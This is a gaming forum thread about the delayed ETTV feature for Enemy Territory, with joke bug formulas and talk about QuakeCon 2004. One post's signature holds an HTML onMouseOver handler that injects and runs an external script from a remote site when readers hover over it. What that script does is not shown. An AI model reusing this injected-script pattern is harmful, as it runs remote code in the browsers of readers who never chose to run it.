ET T what?

Forum for discussing ET TV

Moderators: Forum moderators, developers

*BiO*Tron

Post by *BiO*Tron »

I think Rain meant all these variables to be dates and not percentage values. This makes that formula VERY powerful because you can use it for every project, provided you know the value of "when it's done" (which is maybe a bit unrealistic ;) ).

If you guys told us though the value of "when it started" then everyone could calculate on his own "when it's done" and "percent complete" of today (using 70% for "percent complete" in conjuction with the date of bani's interview). 8)
bani
Site Admin

Post by bani »

Theres also another powerful formula for software development:

B = F + 1

Where B is 'number of bugs in your program' and F is 'number of bugs already found'.
fretn

Post by fretn »

oh I thought it was

bani = fretn + 1
Day by day : http://w.twwwo.be/
Threshold

Post by Threshold »

Well take your time. Doesn't look like there is gonna be ET or RTCW at Qcon 2004... BAH.
jorylit

Post by jorylit »

Threshold wrote:Well take your time. Doesn't look like there is gonna be ET or RTCW at Qcon 2004... BAH.
what is it got to do with qcon, there r still alot of interesting games to watch without qcon.
=FF=im2good4u

Post by =FF=im2good4u »

if a progrma has like 20 bugs found thne you get

b = 20 = 1

so you end up having 21 bugs ..

while i think most programs got more thne 1 hidden bug
jorylit

Post by jorylit »

=FF=im2weak4u wrote:if a progrma has like 20 bugs found thne you get

b = 20 = 1

well gl dealing with the bugs i have no knowlege about programing :roll: but please do it as fast as u can.
mouse

Post by mouse »

jorylit wrote:
Threshold wrote:Well take your time. Doesn't look like there is gonna be ET or RTCW at Qcon 2004... BAH.
what is it got to do with qcon, there r still alot of interesting games to watch without qcon.
well, the target was to finish it when quakecon started, but since that isnt the pressure anymore they can devellop ettv a bit longer :)
Spoofeh

Post by Spoofeh »

QCon was a big blow to the competetive side of ET, so I'd say we need ETTV as soon as possible (i.e. "when it's finished" :wink: ) to give it a boost. If it takes too long there may not be anything worth watching...
=FF=im2good4u

Post by =FF=im2good4u »

mouse wrote:well, the target was to finish it when quakecon started, but since that isnt the pressure anymore they can devellop ettv a bit longer :)
yeh until next year
Rain

Post by Rain »

I would personally still like to have something usable (even if not yet full-featured) in time for Qcon. People are planning BYOB tournament, and while I don't have high expectations of it, it'd be cool to have ETTV handy should it manage to avoid sucking (a real possibility if some people organize things well in the short amount of time left.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
faltytower

Post by faltytower »

jorylit wrote:
=FF=im2weak4u wrote:if a progrma has like 20 bugs found thne you get

b = 20 = 1

well gl dealing with the bugs i have no knowlege about programing :roll: but please do it as fast as u can.
The formula just says that no matter how well a software is coded, it's never going to be perfect. Sort of the like answer to a feasibility proposition or jokes blaming the software developer for software (un)realiability.
Rain wrote:I would personally still like to have something usable (even if not yet full-featured) in time for Qcon. People are planning BYOB tournament, and while I don't have high expectations of it, it'd be cool to have ETTV handy should it manage to avoid sucking (a real possibility if some people organize things well in the short amount of time left.)
:wink: :lol:

While I would have loved to have spectated matches between the best ET team in the world @ an officially sanctioned QCon tournament (be they from NA, SA, Europe, Australia, Asia), I wouldn't mind a cast of a smaller, private one either.
Fade2Black

Post by Fade2Black »

Ah, but just you wait...

Once it becomes !live, they'll be hundereds of new betting shops opening online and we will be the stakes....

Unless i've read human nature wrong...
Kamel

Post by Kamel »

all of you who are asking "when will it be done" have clearly never programmed. you run into problems, you run into bugs. occasionally something major will happen that will cause an entire re-write, or an exemption of code. either way, it's clear that no one but God knows exactly when it will be released, because no one can see into the future (no, not even bani).
"Common sense isn't very common."